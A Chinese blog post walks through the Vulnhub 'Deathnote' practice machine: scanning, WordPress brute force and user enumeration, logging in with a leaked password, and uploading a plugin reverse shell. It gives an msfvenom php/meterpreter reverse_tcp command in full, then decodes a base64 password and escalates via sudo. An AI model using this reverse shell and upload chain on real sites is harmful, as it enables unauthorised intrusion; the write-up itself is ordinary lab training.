Deathnote的靶机渗透

kali扫描不到ip时:关于Vulnhub 靶机ip无法扫描到的解决方法_vulnhub靶机扫描不到ip_葫芦娃42的博客-CSDN博客

获得ip:

进行端口扫描:

只有80的http和22的ssh:

扫描http服务:

在下面看到:

需要域名解析,添加:vim /etc/hosts

访问:

可以猜测是一个wp的框架

尝试爆破一下路径:

爆破到登录的界面:

使用wp扫描一下用户名:

扫描到:

继续看一下网站存不存在密码的信息:

发现hint,点击查看:

看到一个评论,猜测是密码,进行登录:

登录成功

查看插件可不可以进行shell反弹:

生成一个反弹shell的脚本:(msfvenom -p php/meterpreter/reverse_tcp LHOST=yourip LPORT=yourport -f raw > shell.php)

访问该文件(http://deathnote.vuln/wordpress/wp-content/plugins/akismet/wrapper.php),并且本地监听4444:

监听成功:

开启shell:

看到存在两个用户,查看一下passwd的文件:

看到 l 和kira都具有很高的权限

查看一下l用户的东西:

是一个编码,进行解码:

i think u got the shell , but you wont be able to kill me -kira

看来关键还是kira

看一下kira有什么:

没有权限

查看一下L的文件

查看一下opt下的文件:

存在两个文件:

查看一下第一个:

查看一下hint:

提示需要使用cyberchef

查看一下case.wav

尝试解码:

16进制编写字符串:

cGFzc3dkIDoga2lyYWlzZXZpbCA=

base64解码:

passwd : kiraisevil 看来是密码:

尝试kira登录

登录成功:

查看权限:

具有sudo权限:

开启shell:

没有??

使用ssh进行连接:

成功登录,查看sudo权限

竟然是全部,那就修改一个密码吧:

然后登录:

成功登录(只要是可以sudo提权的都可以使用)

都可以

查看文件:

完成!!!

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值